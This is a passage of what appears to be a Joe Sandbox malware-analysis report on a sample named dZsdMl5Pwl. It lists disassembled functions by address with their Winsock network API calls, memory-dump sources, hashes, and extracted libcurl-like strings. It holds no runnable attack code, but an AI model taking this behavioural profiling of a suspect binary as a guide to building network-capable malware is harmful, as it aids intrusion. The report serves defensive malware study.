                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          • Opcode ID: f1d0cf702d2560071c35d05a18cec25fa3113af56e23f86fed10838aa9e75a8f
                                                          • Instruction ID: 4aa732cefad1f2123236f1bdc2e708f35baa254b93a2e5836fa16e67db03fc55
                                                          • Opcode Fuzzy Hash: f1d0cf702d2560071c35d05a18cec25fa3113af56e23f86fed10838aa9e75a8f
                                                          • Instruction Fuzzy Hash: 4801D83A2142049BCB209B789C44E6BB3A9FFC9366F140754F978931D1D726ED509771
                                                          Function 00A4AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 00A4AFD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID:
                                                          • API String ID: 3358416759-0
                                                          • Opcode ID: 261c88bec42c3a157ebb112b458985c84a37bb2477bd103776959f7344276e38
                                                          • Instruction ID: 075a74e64622a0d509e2326a4598ea1626a3bd85744c9265b95f9c1ccb4b9a71
                                                          • Opcode Fuzzy Hash: 261c88bec42c3a157ebb112b458985c84a37bb2477bd103776959f7344276e38
                                                          • Instruction Fuzzy Hash: EA11667084878595EB268F18D8027E6B3F4EFD0329F109619E59942150F7729AC98BD2
                                                          Function 00A4A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00A4A97E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: fa0010bcfd05a9c754b0dac6ca1af61b870b05848dc3da4bcf2818b26984d682
                                                          • Instruction ID: cc8f813a459f7705872caee300b1ee8b2f330711cf1c99120ed19fc3b30fd1f9
                                                          • Opcode Fuzzy Hash: fa0010bcfd05a9c754b0dac6ca1af61b870b05848dc3da4bcf2818b26984d682
                                                          • Instruction Fuzzy Hash: 1B01A276B41710AFC7148F24DC45B5AB7A5EFC4720F0A865DEA982B361C331AC108BD1
                                                          Function 00A4AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(?,00A4B280,00000000,-00000001,00000000,00A4B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00A4AF67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID:
                                                          • API String ID: 98920635-0
                                                          • Opcode ID: c21ce987e958043ea4a3548f57f590bc72515f450906c835f05d18881b626be4
                                                          • Instruction ID: 0e6c72f603eab6b609269353c7c11f1a7022972729f0e9114e002edd4d17a6a5
                                                          • Opcode Fuzzy Hash: c21ce987e958043ea4a3548f57f590bc72515f450906c835f05d18881b626be4
                                                          • Instruction Fuzzy Hash: 79E0EDB6A092216BD654DF18E8449ABF769EFC4B20F055A4DB85867204C330AC568BE2
                                                          Function 00A4B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • closesocket.WS2_32(?,00A49422,?,?,?,?,?,?,?,?,?,?,?,00A33377,00E14C60,00000000), ref: 00A4B04C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID:
                                                          • API String ID: 2781271927-0
                                                          • Opcode ID: 8b78c3216fad740247c530386c6bc97df97b7f3063722cc6ab3fe52690b48687
                                                          • Instruction ID: 59471a5ec9de49f2d2c9702f2f4729f7086bba2fed0ec1ceb1e358cc81371dbb
                                                          • Opcode Fuzzy Hash: 8b78c3216fad740247c530386c6bc97df97b7f3063722cc6ab3fe52690b48687
                                                          • Instruction Fuzzy Hash: 86D0C7787002019BCA20CB28CC84A8B732B7FC0B11F39CB68E42C4A190CB3BCC838621
                                                          Function 009E67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ioctlsocket.WS2_32(?,8004667E,?,?,009BAF56,?,00000001), ref: 009E67FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocket
                                                          • String ID:
                                                          • API String ID: 3577187118-0
                                                          • Opcode ID: b46df2d9381be87a551e03c5add1fef672db628b1a5ed5a517a10930be1232d2
                                                          • Instruction ID: 387d8c70313301b91aa01064df8971ae75ad28fc5ce7f0a26273175db567947c
                                                          • Opcode Fuzzy Hash: b46df2d9381be87a551e03c5add1fef672db628b1a5ed5a517a10930be1232d2
                                                          • Instruction Fuzzy Hash: D7C012F1109200AFC60C4724DC55B2EB6D8DB44255F01591CB04692180EB349450CA16
                                                          Function 009831D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: e1ad980b435d1239bc4c4f97babe29daf03f149e5151a86148a7d85cfac8ae9c
                                                          • Instruction ID: 794d7e6743082b287ec13c9959dbd7e3baec212ca1bb78fe501e4925d4c33218
                                                          • Opcode Fuzzy Hash: e1ad980b435d1239bc4c4f97babe29daf03f149e5151a86148a7d85cfac8ae9c
                                                          • Instruction Fuzzy Hash: AA31B6B4D087049BDB00FFB8C58569EBBF4AF44344F00896DE898A7342E7749A84DF52

                                                          Non-executed Functions

                                                          Function 00994940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                          • API String ID: 0-122532811
                                                          • Opcode ID: 262dfb62de64417e640d71020e075480b64177e2b40257c2cc061a36f7dcbeae
                                                          • Instruction ID: 7037b3e85ca35b85c74c3ae04269a76fa5f11686a0a90b0d3a649a2b67674576
                                                          • Opcode Fuzzy Hash: 262dfb62de64417e640d71020e075480b64177e2b40257c2cc061a36f7dcbeae
                                                          • Instruction Fuzzy Hash: 4242F6B1B08700AFD719DE28CC41B6BB7EAEBC4704F048A2CF55D97391E775A9058B92
                                                          Function 00A39880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                          • API String ID: 0-1574211403
                                                          • Opcode ID: d5d11978edd9488d7f1bee53afd0f3153cc852453bfb4d09fd0e1afea6340779
                                                          • Instruction ID: 62c2a9dfa777a4e58d52e479f643431d996d18fd2d5cfddac41d712019114b92
                                                          • Opcode Fuzzy Hash: d5d11978edd9488d7f1bee53afd0f3153cc852453bfb4d09fd0e1afea6340779
                                                          • Instruction Fuzzy Hash: A261D6B5E083016BE714AB24AD52B3BB2D99BD5344F04843DFC8A96293FEB1ED149253
                                                          Function 009A4F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                          • API String ID: 0-1914377741
                                                          • Opcode ID: fff7a27b32906b8e88c2dc4b443a4adf3b1aa699e743499bd53f905ef7e42f52
                                                          • Instruction ID: 0bf0c4c5f1a4e68799cf8dba178caa1a8d7bb684fb1793e5bb46ad6826476f23
                                                          • Opcode Fuzzy Hash: fff7a27b32906b8e88c2dc4b443a4adf3b1aa699e743499bd53f905ef7e42f52
                                                          • Instruction Fuzzy Hash: 6C725B70B08B419FE7218A28C4467A7B7D69F92744F0A8A1CED845B2D3E7B6DC84D7C1
                                                          Function 00A4EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$;$?$?$xn--$xn--
                                                          • API String ID: 0-543057197
                                                          • Opcode ID: 7ca0847add58854bd1ee92f46afc23ffddc535abc03d37274f667131ccb3f077
                                                          • Instruction ID: 26b0f8f0085b7fdf742aa219d951ef6a73c45a8e2aa153e8060904528e06221f
                                                          • Opcode Fuzzy Hash: 7ca0847add58854bd1ee92f46afc23ffddc535abc03d37274f667131ccb3f077
                                                          • Instruction Fuzzy Hash: 662215BAA04301AFEB209B24DC41B6B77E4AFD0309F05553CF89997292F775E908C792
                                                          Function 0098A960 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
